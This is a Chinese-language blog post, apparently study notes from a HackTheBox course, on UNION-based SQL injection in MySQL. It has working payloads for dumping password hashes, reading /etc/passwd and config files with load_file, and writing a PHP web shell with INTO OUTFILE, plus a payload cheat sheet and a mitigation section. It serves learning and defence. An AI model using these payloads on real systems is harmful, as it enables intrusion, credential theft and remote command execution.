<h3 id="通过SQL读取系统文件"><a href="#通过SQL读取系统文件" class="headerlink" title="通过SQL读取系统文件"></a>通过SQL读取系统文件</h3><ol>
<li><p>查看文件是否有<code>super_priv</code>权限，</p>
<ul>
<li>输入<code>cn&#39; union select null,super_priv,null,null from mysql.user -- -</code></li>
<li>此前查看我们当前登录的用户是<code>root@localhost</code></li>
<li>可以通过该用户名查当前是否拥有该权限，将其显示在表格中</li>
<li>此处的<code>Y</code>证明该权限的存在<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> * <span class="keyword">from</span> XXX <span class="keyword">where</span> port_code =<span class="string">'cn'</span> <span class="keyword">union</span> \</span><br><span class="line"><span class="keyword">select</span> <span class="literal">null</span>,super_priv,<span class="literal">null</span>,<span class="literal">null</span> <span class="keyword">from</span> mysql.user \</span><br><span class="line"><span class="keyword">where</span> <span class="keyword">user</span> = <span class="string">'root'</span> <span class="comment">-- -`</span></span><br><span class="line"></span><br><span class="line">+<span class="comment">------------+------------+-------------+</span></span><br><span class="line">| Port Code  | Port City  | Port Volume |</span><br><span class="line">+<span class="comment">------------+------------+-------------+</span></span><br><span class="line">| Y          |            |             |</span><br><span class="line">+<span class="comment">------------+------------+-------------+</span></span><br></pre></td></tr></table></figure>
</li>
</ul>
</li>
<li><p>获得数据root@localhost的密码哈稀值</p>
<ul>
<li>通过查看数据库<code>mysql.user</code>获得</li>
<li>输入<code>cn&#39; union select null, user, password, null from mysql.user -- -</code><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> * <span class="keyword">from</span> XXX <span class="keyword">where</span> port_code =<span class="string">'cn'</span> <span class="keyword">union</span> \</span><br><span class="line"><span class="keyword">select</span> <span class="literal">null</span>, <span class="keyword">user</span>, <span class="keyword">password</span>, <span class="literal">null</span> <span class="keyword">from</span> mysql.user <span class="comment">-- -'</span></span><br><span class="line">+<span class="comment">------------+-------------------------------------------+-------------+</span></span><br><span class="line">| Port Code  |                Port City                  | Port Volume |</span><br><span class="line">+<span class="comment">------------+-------------------------------------------+-------------+</span></span><br><span class="line">| root       | *<span class="number">00</span>CD4F3F18928665AE2E1485012AC46B5E25B933 |             |</span><br><span class="line">+<span class="comment">------------+-------------------------------------------+-------------+</span></span><br></pre></td></tr></table></figure>
</li>
</ul>
</li>
<li><p>查看用户文件权限属性</p>
<ul>
<li>输入<code>cn&#39; union select null, grantee, privilege_type, is_grantable from information_schema.user_privileges -- -</code></li>
<li>通过<code>information_shcema.user_privileges</code>读取字段<code>grantee</code>, <code>privilege_type, is_grantable</code></li>
<li>主要关注<code>FILE</code>权限是<code>YES</code>表明对文件有阅读权限<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> * <span class="keyword">from</span> XXX <span class="keyword">where</span> port_code =<span class="string">'cn'</span> <span class="keyword">union</span> \</span><br><span class="line"><span class="keyword">select</span> <span class="literal">null</span>, grantee, privilege_type, is_grantable \</span><br><span class="line"><span class="keyword">from</span> information_schema.user_privileges <span class="comment">-- -'</span></span><br><span class="line"></span><br><span class="line">+<span class="comment">--------------------+------------+-------------+</span></span><br><span class="line">|     Port Code      | Port City  | Port Volume |</span><br><span class="line">+<span class="comment">--------------------+------------+-------------+</span></span><br><span class="line">| <span class="string">'root'</span>@<span class="string">'localhost'</span> | <span class="keyword">SELECT</span>     | YES         |</span><br><span class="line">| <span class="string">'root'</span>@<span class="string">'localhost'</span> | <span class="keyword">INSERT</span>     | YES         |</span><br><span class="line">| <span class="string">'root'</span>@<span class="string">'localhost'</span> | <span class="keyword">UPDATE</span>     | YES         |</span><br><span class="line">| <span class="string">'root'</span>@<span class="string">'localhost'</span> | <span class="keyword">DELETE</span>     | YES         |</span><br><span class="line">| <span class="string">'root'</span>@<span class="string">'localhost'</span> | <span class="keyword">CREATE</span>     | YES         |</span><br><span class="line">| <span class="string">'root'</span>@<span class="string">'localhost'</span> | <span class="keyword">DROP</span>       | YES         |</span><br><span class="line">| <span class="string">'root'</span>@<span class="string">'localhost'</span> | RELOAD     | YES         |</span><br><span class="line">| <span class="string">'root'</span>@<span class="string">'localhost'</span> | <span class="keyword">SHUTDOWN</span>   | YES         |</span><br><span class="line">| <span class="string">'root'</span>@<span class="string">'localhost'</span> | PROCESS    | YES         |</span><br><span class="line">| <span class="string">'root'</span>@<span class="string">'localhost'</span> | <span class="keyword">FILE</span>       | YES         |</span><br><span class="line">|      SNIP          | SNIP       | SNIP        |</span><br><span class="line">+<span class="comment">--------------------+------------+-------------+</span></span><br></pre></td></tr></table></figure>
</li>
</ul>
</li>
<li><p>读取文件<code>/etc/passwd</code></p>
</li>
</ol>
<ul>
<li>输入<code>cn&#39; union select null, load_file(&#39;/etc/passwd&#39;), null, null -- -</code></li>
<li>通过函数<code>select load_file(&#39;/path/to/file&#39;)</code><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> * <span class="keyword">from</span> XXX <span class="keyword">where</span> port_code =<span class="string">'cn'</span> <span class="keyword">union</span> \</span><br><span class="line"><span class="keyword">select</span> <span class="literal">null</span>, <span class="keyword">load_file</span>(<span class="string">'/etc/passwd'</span>), <span class="literal">null</span>, <span class="literal">null</span> <span class="comment">-- -</span></span><br><span class="line"></span><br><span class="line">+<span class="comment">------------------------------------------+-----------+-------------+</span></span><br><span class="line">|                Port Code                 | Port City | Port Volume |</span><br><span class="line">+<span class="comment">------------------------------------------+-----------+-------------+</span></span><br><span class="line">| root:x:<span class="number">0</span>:<span class="number">0</span>:root:&lt;SNIP&gt;:/usr/sbin/nologin |           |             |</span><br><span class="line">+<span class="comment">------------------------------------------+-----------+-------------+</span></span><br></pre></td></tr></table></figure>
</li>
</ul>
<ol start="5">
<li>在页面内读取<code>search.php</code>源代码，获得配置文件</li>
</ol>
<ul>
<li><p>目前已经可以在提供的表格中展示查看到的内容</p>
</li>
<li><p>我们可以尝试将<code>search.php</code>的源代码文件放在上面显示（/var/www/html 默认apache2的目录）</p>
</li>
<li><p>输入<code>cn&#39; union select null, load_file(&#39;/var/www/html/search.php&#39;), null, null -- -</code></p>
</li>
<li><p>利用<code>Ctrl+U</code>，可以打开浏览器源代码页面<br><img src="souce.png" alt="source"></p>
</li>
<li><p>此时，我们发现源代码中引入了<code>config.php</code>，这个我们此前不知道的文件，我们照例将其输出到页面的表格中查看内容</p>
</li>
<li><p>输入<code>cn&#39; union select null, load_file(&#39;/var/www/html/config.php&#39;), null, null -- -</code><br><img src="config.png" alt="config"></p>
</li>
</ul>
<h3 id="通过SQL创建webshell"><a href="#通过SQL创建webshell" class="headerlink" title="通过SQL创建webshell"></a>通过SQL创建webshell</h3><ul>
<li>文件的写入是一个十分敏感的操作，对于<code>Mariadb/MySQL</code>数据库，我们可以通过查看<code>secure_file_priv</code>字段的内容设置获得更多信息。</li>
<li>secure_file_priv: 限制数据库导入导出（import/export）操作的关键参数。在<code>file</code>属性被设置为<code>YES</code>的前提下，查看该参数。<ul>
<li>‘ ‘ (<code>empty</code>): 表示该参数没有生效，意味这没有进行设定，因此可通过MySQL语句进行导入/导出(写入)操作</li>
<li>NULL: 表示系统不允许进行导入/导出操作</li>
<li>/path/to/some/dir: 指定相关的路径下拥有导入/导出操作</li>
</ul>
</li>
<li>提示： MariaDB默认会将该值设为<code>empty</code>，因此允许我们对系统进行读写操作。MySQL默认使用<code>/var/lib/mysql-files</code>作为其内容，因此仅仅能在该目录下在下读写。</li>
</ul>
<ol>
<li>查看<code>secure_file_priv</code>设定<ul>
<li>输入<code>cn&#39; union select NULL, variable_name, variable_value,NULL FROM information_schema.global_variables where variable_name=&#39;secure_file_priv&#39;-- -</code></li>
<li>通过查看数据表<code>information_schema.global_variables</code>过滤相关字段<code>secure_file_priv</code><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> * <span class="keyword">from</span> XXX <span class="keyword">where</span> port_code =<span class="string">'cn'</span> <span class="keyword">union</span> \</span><br><span class="line"><span class="keyword">select</span> <span class="literal">NULL</span>, variable_name, variable_value,<span class="literal">NULL</span> \</span><br><span class="line"><span class="keyword">FROM</span> information_schema.global_variables \</span><br><span class="line"><span class="keyword">where</span> variable_name=<span class="string">'secure_file_priv'</span><span class="comment">-- -'</span></span><br><span class="line"></span><br><span class="line">+<span class="comment">------------------+------------+-------------+</span></span><br><span class="line">|    Port Code     | Port City  | Port Volume |</span><br><span class="line">+<span class="comment">------------------+------------+-------------+</span></span><br><span class="line">| SECURE_FILE_PRIV |            |             |</span><br><span class="line">+<span class="comment">------------------+------------+-------------+</span></span><br></pre></td></tr></table></figure>


</li>
</ul>
</li>
</ol>
<ol start="2">
<li>在当前目录下，写入内容<code>proof.txt</code><ul>
<li>输入 <code>cn&#39; union select 1,&#39;file written successfully!&#39;, 3, 4 into outfile &#39;/var/www/html/proof.txt&#39; -- -</code></li>
<li>通过使用<code>select txt1,txt2,txt3,txt4 into outfile &#39;/path/to/file&#39;</code>写入文件</li>
<li>执行该操作后页面是不会有输出的，可以通过此前查看文件的方式验证 <code>cn&#39; union select null, load_file(&#39;/var/www/html/proof.txt&#39;), null, null -- -</code><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">+<span class="comment">----------------------------------+------------+-------------+</span></span><br><span class="line">|            Port Code             | Port City  | Port Volume |</span><br><span class="line">+<span class="comment">----------------------------------+------------+-------------+</span></span><br><span class="line">| 1 file written successfully! 3 4 |            |             |</span><br><span class="line">+<span class="comment">----------------------------------+------------+-------------+</span></span><br></pre></td></tr></table></figure>


</li>
</ul>
</li>
</ol>
<ul>
<li>直到目前我们通过SQLi的方式，已经可以对远程服务器进行文件的读取和文件的写入了。这已经能对服务器造成很大的影响，我们可以去尝试撞击服务器的敏感文件例如<code>/etc/shadow</code>或其他服务的敏感数据，进而获得更高的用户权限，甚至利用其他漏洞达到<code>rootkit</code>获取最高权限。为了让我们的操作更为方便，我们可以通过<code>webshell</code>来方便我们的操作。</li>
<li><code>webshell</code>是一个恶意脚本，其目的一般是为了提高权限和持续访问和对已经受到攻击的网络应用持续访问。webshell不能被攻击或作为远程漏洞被利用，因此一般作为攻击后的第二步。</li>
<li><code>webshell</code>可以通过多种web编程语言去书写，其中<code>PHP</code>是最为流行的。无论你是自行开发的软件还是常见的内容管理系统如：Wordpress插件。<code>webshell</code>也不会被防病毒或反恶意软件检测到，因为它们不使用典型的可执行文件类型。同时，它们很容易向公众提供，例如，通过几个GitHub项目。</li>
</ul>
<ol start="3">
<li><p>在当前网络应用注入<code>websehll</code>，文件名称为<code>shell.php</code></p>
<ul>
<li>输入<code>cn&#39; union select &quot;&quot;,&#39;&lt;?php system($_REQUEST[0]); ?&gt;&#39;, &quot;&quot;, &quot;&quot; into outfile &#39;/var/www/html/shell.php&#39;-- -</code></li>
<li>将<code>&lt;?php system($_REQUEST[0];) ?&gt;</code>写入到<code>/var/www/html/shell.php</code>这个文件上</li>
<li>访问页面<code>shell.php</code>, 通过?0=<code>cmd</code>传入名利参数<ul>
<li><a href="http://ip.ip.ip.ip:port/shell.php?0=id" target="_blank" rel="noopener">http://ip.ip.ip.ip:port/shell.php?0=id</a></li>
</ul>
</li>
</ul>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># http://ip.ip.ip.ip:port/shell/php?0=id</span></span><br><span class="line">uid=33(www-data) gid=33(www-data) groups=33(www-data)</span><br><span class="line"></span><br><span class="line"><span class="comment"># http://ip.ip.ip.ip:port/shell/php?0=whoami</span></span><br><span class="line">www-data</span><br></pre></td></tr></table></figure>

</li>
</ol>
<h2 id="如何缓解SQL注入"><a href="#如何缓解SQL注入" class="headerlink" title="如何缓解SQL注入"></a>如何缓解SQL注入</h2><ul>
<li>应用程序层面<ul>
<li>正如上门所说的，我们能够使用<code>UNION</code>进行带内注入，是有赖于应用开发过程中，遗留下了数据库执行的提示信息。在应用开发的过程中，调用数据库的提示内容确实有助于开发时的问题排查，但在提交到生产环境山上，这样的代码有着很大的危险，应该引起重视。</li>
<li><code>UNION</code>能实现的本质是，用户输入的内容未进行<code>清洗</code>便直接用于执行，这种对用户输入的信任是不且当的。对于用户的输入内容，均必须进行必要的清洗，不能直接拿来使用。</li>
<li>除了对数据进行清洗，在数据输入的同时我们也应该首先对数据进行必要的检测。目前输入数据的检查，已经相当成熟，对于用户的内容输入例如<code>邮箱</code>，可以通过简单的正则匹配，确认其是否有正确输入，对于密码输入的内容，应该限制客户使用的密码长度，选用的特殊字符等内容，以避免用户输入<code>&#39;, --</code>这类数据库保留的的元字符。</li>
</ul>
</li>
<li>数据库层面<ul>
<li>数据库的用户权限应该被限制，默认的<code>root@localhost</code>用户拥有这过大的权限，一旦被攻破其巨大的权限同时以为这强大的破坏力。</li>
<li>数据库的视图SHEMA是一个对数据表格限制有力的工具，只需要几个简单步骤就能创建出来，创建的视图可以将权限分配给特定的数据库用户，该用户应该只具备对该试图进行查看的操作。</li>
<li>数据库的<code>file</code>权限是一个很大的权限，该权限应该被加以限制，如没有特定需要的服务，不应该开启该权限功能</li>
<li>数据库的<code>secure_file_priv</code>应该按照将其强制设定在指定的目录或可读的<code>NULL</code>模式，而不能贪图方便将其设定在<code>(empty)</code>空模式下</li>
</ul>
</li>
<li>额外的内容<ul>
<li>对于网络应用程序的安全，目前不少云服务供应商都会提供<code>Web application firewall</code>（WAF）的相关功能，这些功能能有效检测HTTP的恶意请求，建议可按需进行开启，也算是为应用增加了一层防护。</li>
</ul>
</li>
</ul>
<h1 id="补充延伸"><a href="#补充延伸" class="headerlink" title="补充延伸"></a>补充延伸</h1><table>
<thead>
<tr>
<th><strong>Command</strong></th>
<th><strong>Description</strong></th>
</tr>
</thead>
<tbody><tr>
<td><strong>General</strong></td>
<td></td>
</tr>
<tr>
<td><code>mysql -u root -h docker.hackthebox.eu -P 3306 -p</code></td>
<td>login to mysql database</td>
</tr>
<tr>
<td><code>SHOW DATABASES</code></td>
<td>List available databases</td>
</tr>
<tr>
<td><code>USE users</code></td>
<td>Switch to database</td>
</tr>
<tr>
<td><strong>Tables</strong></td>
<td></td>
</tr>
<tr>
<td><code>CREATE TABLE logins (id INT, ...)</code></td>
<td>Add a new table</td>
</tr>
<tr>
<td><code>SHOW TABLES</code></td>
<td>List available tables in current database</td>
</tr>
<tr>
<td><code>DESCRIBE logins</code></td>
<td>Show table properties and columns</td>
</tr>
<tr>
<td><code>INSERT INTO table_name VALUES (value_1,..)</code></td>
<td>Add values to table</td>
</tr>
<tr>
<td><code>INSERT INTO table_name(column2, ...) VALUES (column2_value, ..)</code></td>
<td>Add values to specific columns in a table</td>
</tr>
<tr>
<td><code>UPDATE table_name SET column1=newvalue1, ... WHERE &lt;condition&gt;</code></td>
<td>Update table values</td>
</tr>
<tr>
<td><strong>Columns</strong></td>
<td></td>
</tr>
<tr>
<td><code>SELECT * FROM table_name</code></td>
<td>Show all columns in a table</td>
</tr>
<tr>
<td><code>SELECT column1, column2 FROM table_name</code></td>
<td>Show specific columns in a table</td>
</tr>
<tr>
<td><code>DROP TABLE logins</code></td>
<td>Delete a table</td>
</tr>
<tr>
<td><code>ALTER TABLE logins ADD newColumn INT</code></td>
<td>Add new column</td>
</tr>
<tr>
<td><code>ALTER TABLE logins RENAME COLUMN newColumn TO oldColumn</code></td>
<td>Rename column</td>
</tr>
<tr>
<td><code>ALTER TABLE logins MODIFY oldColumn DATE</code></td>
<td>Change column datatype</td>
</tr>
<tr>
<td><code>ALTER TABLE logins DROP oldColumn</code></td>
<td>Delete column</td>
</tr>
<tr>
<td><strong>Output</strong></td>
<td></td>
</tr>
<tr>
<td><code>SELECT * FROM logins ORDER BY column_1</code></td>
<td>Sort by column</td>
</tr>
<tr>
<td><code>SELECT * FROM logins ORDER BY column_1 DESC</code></td>
<td>Sort by column in descending order</td>
</tr>
<tr>
<td><code>SELECT * FROM logins ORDER BY column_1 DESC, id ASC</code></td>
<td>Sort by two-columns</td>
</tr>
<tr>
<td><code>SELECT * FROM logins LIMIT 2</code></td>
<td>Only show first two results</td>
</tr>
<tr>
<td><code>SELECT * FROM logins LIMIT 1, 2</code></td>
<td>Only show first two results starting from index 2</td>
</tr>
<tr>
<td><code>SELECT * FROM table_name WHERE &lt;condition&gt;</code></td>
<td>List results that meet a condition</td>
</tr>
<tr>
<td><code>SELECT * FROM logins WHERE username LIKE &#39;admin%&#39;</code></td>
<td>List results where the name is similar to a given string</td>
</tr>
</tbody></table>
<h2 id="MySQL-Operator-Precedence"><a href="#MySQL-Operator-Precedence" class="headerlink" title="MySQL Operator Precedence"></a>MySQL Operator Precedence</h2><ul>
<li>Division (<code>/</code>), Multiplication (<code>*</code>), and Modulus (<code>%</code>)</li>
<li>Addition (<code>+</code>) and Subtraction (<code>-</code>)</li>
<li>Comparison (<code>=</code>, <code>&gt;</code>, <code>&lt;</code>, <code>&lt;=</code>, <code>&gt;=</code>, <code>!=</code>, <code>LIKE</code>)</li>
<li>NOT (<code>!</code>)</li>
<li>AND (<code>&amp;&amp;</code>)</li>
<li>OR (<code>||</code>)</li>
</ul>
<h2 id="SQL-Injection"><a href="#SQL-Injection" class="headerlink" title="SQL Injection"></a>SQL Injection</h2><table>
<thead>
<tr>
<th><strong>Payload</strong></th>
<th><strong>Description</strong></th>
</tr>
</thead>
<tbody><tr>
<td><strong>Auth Bypass</strong></td>
<td></td>
</tr>
<tr>
<td><code>admin&#39; or &#39;1&#39;=&#39;1</code></td>
<td>Basic Auth Bypass</td>
</tr>
<tr>
<td><code>admin&#39;)-- -</code></td>
<td>Basic Auth Bypass With comments</td>
</tr>
<tr>
<td><a href="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection#authentication-bypass" target="_blank" rel="noopener">Auth Bypass Payloads</a></td>
<td></td>
</tr>
<tr>
<td><strong>Union Injection</strong></td>
<td></td>
</tr>
<tr>
<td><code>&#39; order by 1-- -</code></td>
<td>Detect number of columns using <code>order by</code></td>
</tr>
<tr>
<td><code>cn&#39; UNION select 1,2,3-- -</code></td>
<td>Detect number of columns using Union injection</td>
</tr>
<tr>
<td><code>cn&#39; UNION select 1,@@version,3,4-- -</code></td>
<td>Basic Union injection</td>
</tr>
<tr>
<td><code>UNION select username, 2, 3, 4 from passwords-- -</code></td>
<td>Union injection for 4 columns</td>
</tr>
<tr>
<td><strong>DB Enumeration</strong></td>
<td></td>
</tr>
<tr>
<td><code>SELECT @@version</code></td>
<td>Fingerprint MySQL with query output</td>
</tr>
<tr>
<td><code>SELECT SLEEP(5)</code></td>
<td>Fingerprint MySQL with no output</td>
</tr>
<tr>
<td><code>cn&#39; UNION select 1,database(),2,3-- -</code></td>
<td>Current database name</td>
</tr>
<tr>
<td><code>cn&#39; UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -</code></td>
<td>List all databases</td>
</tr>
<tr>
<td><code>cn&#39; UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema=&#39;dev&#39;-- -</code></td>
<td>List all tables in a specific database</td>
</tr>
<tr>
<td><code>cn&#39; UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name=&#39;credentials&#39;-- -</code></td>
<td>List all columns in a specific table</td>
</tr>
<tr>
<td><code>cn&#39; UNION select 1, username, password, 4 from dev.credentials-- -</code></td>
<td>Dump data from a table in another database</td>
</tr>
<tr>
<td><strong>Privileges</strong></td>
<td></td>
</tr>
<tr>
<td><code>cn&#39; UNION SELECT 1, user(), 3, 4-- -</code></td>
<td>Find current user</td>
</tr>
<tr>
<td><code>cn&#39; UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user=&quot;root&quot;-- -</code></td>
<td>Find if user has admin privileges</td>
</tr>
<tr>
<td><code>cn&#39; UNION SELECT 1, grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE user=&quot;root&quot;-- -</code></td>
<td>Find if all user privileges</td>
</tr>
<tr>
<td><code>cn&#39; UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name=&quot;secure_file_priv&quot;-- -</code></td>
<td>Find which directories can be accessed through MySQL</td>
</tr>
<tr>
<td><strong>File Injection</strong></td>
<td></td>
</tr>
<tr>
<td><code>cn&#39; UNION SELECT 1, LOAD_FILE(&quot;/etc/passwd&quot;), 3, 4-- -</code></td>
<td>Read local file</td>
</tr>
<tr>
<td><code>select &#39;file written successfully!&#39; into outfile &#39;/var/www/html/proof.txt&#39;</code></td>
<td>Write a string to a local file</td>
</tr>
<tr>
<td><code>cn&#39; union select &quot;&quot;,&#39;&lt;?php system($_REQUEST[0]); ?&gt;&#39;, &quot;&quot;, &quot;&quot; into outfile &#39;/var/www/html/shell.php&#39;-- -</code></td>
<td>Write a web shell into the base web directory</td>
</tr>
</tbody></table>
<h1 id="参考链接"><a href="#参考链接" class="headerlink" title="参考链接"></a>参考链接</h1><ul>
<li><a href="https://www.acunetix.com/websitesecurity/sql-injection2/" target="_blank" rel="noopener">Types of SQL Injection</a>    # SQL注入类型</li>
<li><a href="https://dev.mysql.com/doc/refman/8.0/en/information-schema-introduction.html" target="_blank" rel="noopener">INFORMATION SCHEMA Tables</a>   # INFORMATION_SCHEMA 信息</li>
<li><a href="https://dev.mysql.com/doc/refman/5.7/en/server-system-variables.html#sysvar_secure_file_priv" target="_blank" rel="noopener">secure file priv</a>  # secure_file_priv 信息</li>
<li><a href="https://www.acunetix.com/blog/articles/introduction-web-shells-part-1/" target="_blank" rel="noopener">webshell articles</a>   # An Introduction to Web Shells</li>
<li><a href="https://academy.hackthebox.com/module/details/33" target="_blank" rel="noopener">SQL Injection Fundamentals</a>  # relevant course</li>
</ul>

      
    </div>

    

    
      
    

    
    
    

    

    
      
    
    

    

    <footer class="post-footer">
      
        
          
        
        <div class="post-tags">
          
            <a href="/tags/offensive/" rel="tag"># offensive</a>
          
            <a href="/tags/sqli/" rel="tag"># sqli</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2022/01/04/nmap-2/" rel="next" title="nmap实践和引擎基础">
                <i class="fa fa-chevron-left"></i> nmap实践和引擎基础
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>


  </div>


          </div>
          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-overview">

          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  
    <img class="site-author-image" itemprop="image" src="/images/avatar.gif" alt="Alopex Cheung">
  
  <p class="site-author-name" itemprop="name">Alopex Cheung</p>
  <div class="site-description motion-element" itemprop="description"></div>
</div>


  <nav class="site-state motion-element">
    
      <div class="site-state-item site-state-posts">
        
          <a href="/archives/">
        
          <span class="site-state-item-count">21</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
    

    
      
      
      <div class="site-state-item site-state-categories">
        
          
            <a href="/categories/">
          
        
        
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
        <span class="site-state-item-count">23</span>
        <span class="site-state-item-name">分类</span>
        </a>
      </div>
    

    
      
      
      <div class="site-state-item site-state-tags">
        
          
            <a href="/tags/">
          
        
        
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
          
        
        <span class="site-state-item-count">38</span>
        <span class="site-state-item-name">标签</span>
        </a>
      </div>
    
  </nav>







  <div class="links-of-author motion-element">
    
      <span class="links-of-author-item">
      
      
      
        
      
        <a href="https://github.com/Alopex4" title="GitHub &rarr; https://github.com/Alopex4" rel="noopener" target="_blank"><i class="fa fa-fw fa-github"></i></a>
      </span>
    
      <span class="links-of-author-item">
      
      
      
        
      
        <a href="mailto:tiandiv4@gmail.com" title="E-Mail &rarr; mailto:tiandiv4@gmail.com" rel="noopener" target="_blank"><i class="fa fa-fw fa-envelope"></i></a>
      </span>
    
  </div>







          
          
        </div>
      </div>

      
      <!--noindex-->
        <div class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
            
            
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#引言"><span class="nav-number">1.</span> <span class="nav-text">引言:</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#预备知识"><span class="nav-number">2.</span> <span class="nav-text">预备知识</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#正文内容"><span class="nav-number">3.</span> <span class="nav-text">正文内容</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#SQL注入基本介绍"><span class="nav-number">3.1.</span> <span class="nav-text">SQL注入基本介绍</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#SQL注入的基本流程"><span class="nav-number">3.2.</span> <span class="nav-text">SQL注入的基本流程</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#数据库基本信息的获得"><span class="nav-number">3.2.1.</span> <span class="nav-text">数据库基本信息的获得</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#通过SQL读取系统文件"><span class="nav-number">3.2.2.</span> <span class="nav-text">通过SQL读取系统文件</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#通过SQL创建webshell"><span class="nav-number">3.2.3.</span> <span class="nav-text">通过SQL创建webshell</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#如何缓解SQL注入"><span class="nav-number">3.3.</span> <span class="nav-text">如何缓解SQL注入</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#补充延伸"><span class="nav-number">4.</span> <span class="nav-text">补充延伸</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#MySQL-Operator-Precedence"><span class="nav-number">4.1.</span> <span class="nav-text">MySQL Operator Precedence</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#SQL-Injection"><span class="nav-number">4.2.</span> <span class="nav-text">SQL Injection</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#参考链接"><span class="nav-number">5.</span> <span class="nav-text">参考链接</span></a></li></ol></div>
            

          </div>
        </div>
      <!--/noindex-->
      

      

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2022</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Alopex Cheung</span>

  
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
    
    <span title="站点总字数">208k</span>
  

  
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    
    <span title="站点阅读时长">5:47</span>
  
</div>


  <div class="powered-by">由 <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a>  v3.9.0</div>



  <span class="post-meta-divider">|</span>



